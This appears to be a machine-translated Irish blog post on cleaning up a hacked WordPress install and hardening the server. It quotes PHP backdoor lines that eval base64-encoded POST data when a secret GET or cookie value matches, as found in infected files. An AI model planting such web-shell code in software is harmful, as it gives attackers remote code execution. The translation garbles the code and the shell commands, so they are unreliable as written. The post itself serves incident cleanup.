WordPress Leas a bhaint as - glanadh na comhaid gcontúirt, agus slándáil SQL Server.

Sula léann tú an post seo, ba chóir duit a fheiceáil , Chun tuiscint a fháil ar rud éigin. :)

Fuair ​​muid go leor de na blaganna ar chomhaid stealthsettings.com, cód atá cosúil leis an thíos, a eascraíonn as an virusarii le leas a bhaint as WordPress.:

? <Php más rud é ($ _ GET [ '573abcb060974771'] == "8e96d1b4b674e1d2") {eval (base64_decode ($ _ POST [ 'comhad'])); scoir; }?>

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

xmlrpcMá tá an thuas mar gheall ar an comhad a xmlrpc.php ó Sleepy, Ag grep freastalaí Breathnaíonn, cosúil le go leor leor den chineál seo i cód foinse.

pppffiuuu

Glanadh na comhaid ionfhabhtaithe:

Ooookkkk ...
1. An réiteach is fearr, mar go bhfuil sé déanta cúltacaAgus is é an bunachar sonraí glanadh go bhaint Comhaid WordPress ar an bhfreastalaí (Is féidir le Wp-config.php comhaid nach bhfuil dlúthbhaint ardán WP, tar éis a sheiceáil go cúramach a choinneáil) agus a dhéanamh a uaslódáil an leagan bunaidh 2.5.1 (Ar an ócáid ​​agus a dhéanamh ar leagan uasghrádú WP :)) http://wordpress.org/download/ . Wipe lena n-áirítear comhaid téama mura bhfuil muinín agat go bhfuil a gcuid sheiceáil go cúramach.

Dealraíonn sé go bhfuil tionchar a bhí agus comhaid de na téamaí sin a bhí in úsáid cheana ar an bhlag agus athrú ach an téama nach bhfuil, an fhadhb a réiteach.

./andreea/wp-content/themes/default/index.php:<?php más rud é ($ _ fianán ['44e827f9fbeca184'] == '5cd3c94b4b1c57ea ") {eval (base64_decode ($ _ POST [' comhad '])); scoir; (}> <PHP get_header)??; ?>

2. Cuardaigh agus gach comhad ina bhfuil a scriosadh:... * _new.php, * _old.php, * Jpgg, * Giff, * Pngg agus comhad WP-info.txt, más ann.

Faigh. -Ainm "* _new.php"
Faigh. -Ainm "* _old.php"
Faigh. -Ainm "*. Jpgg"
Faigh. -Ainm "* _giff"
Faigh. -Ainm "* _pngg"
Faigh. -Ainm "WP-info.txt"

3. i / Tmp , Cuardaigh agus fillteáin cosúil le scriosadh tmpYwbzT2

SQL Glanadh :

1. i dTábla Tábla wp_options Seiceáil do agus na línte scriosadh: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Gach i wp_options, téigh go dtí active_plugins agus scrios má tá breiseán a chríochnaíonn i gceann de na síntí * _new.php, * _old.php, *. jpgg, *. giff, *. pngg nó má tá síneadh eile amhras, a sheiceáil go cúramach.

3. I dTábla wp_users, Féach má tá úsáideoir nach bhfuil aon rud scríofa ina cheart, leasaítear an colún user_nicename. Scrios an t-úsáideoir seo, ach tabhair faoi deara an uimhir sa cholún ID. Is dócha go mbainfidh an t-úsáideoir "WordPress" mar seo user_login a cruthaíodh agus an chuma ar 00: 00: 00 0000 00-00-.

4. Téigh go dtí an Tábla wp_usermeta agus scriosadh na línte a bhaineann haitheantas thuas.

Tar éis duit an déanta glanadh SQL, a dhíchumasú agus ansin ar chumas breiseán áirithe. (I blog -> Painéal na -> Forlíontáin)

Freastalaí slán:

1. Féach cad iad Eolairí agus comhaid "inscríofa"(Tástáil chmod 777) agus iarracht a dhéanamh a chur ar iad a chmod Ní chuirfeadh ar chumas a gcuid scríbhneoireachta ag leibhéal ar bith. (Chmod 644, mar shampla)

Faigh. -Perm-2-ls

2. Féach cad bhfuil comhaid an leagan giotán suidsgid . Más rud é nach bhfuil tú ag úsáid na comhaid sin a chur orthu chmod 0 nó dhíshuiteáil an pacáiste go bhfuil sé. Tá siad an-chontúirteach, mar gheall ar fhorghníomhú siad pribhléidí "grúpa"Nó"root"Gan le pribhléidí úsáideora gnáth a fhorghníomhú go comhad.

aimsiú /-cineál f-Perm-04000-ls
aimsiú /-cineál f-Perm-02000-ls

3. Seiceáil cad iad na calafoirt oscailte agus iarracht a dhúnadh nó a dhaingniú siúd nach bhfuil in úsáid.

netstat-ar | éisteacht grep-i

Mar sin, i bhfad. Feicim Google Search agus daoine eile a rá "Bhuel a rinne tú !!!". Maith go maith a bheith déanta agam é ... ach tá a fhios agat má thosaíonn Google a thoirmeasc gach suíomh dteacht IS Spam agus Trojans a chur (Trojan.Clicker.HTML) i fianáin?

WordPress Leas a bhaint as - glanadh na comhaid gcontúirt, agus slándáil SQL Server.

Maidir leis an údar

Stealth

Paiseanta faoi gach rud a chiallaíonn gadget agus TF, scríobhaim le pléisiúr ar stealthsettings.com ó 2006 agus is breá liom rudaí nua a aimsiú leat faoi ríomhairí agus macOS, córais oibriúcháin Linux, Windows, iOS agus Android.

Cuir Comment

Leave a Comment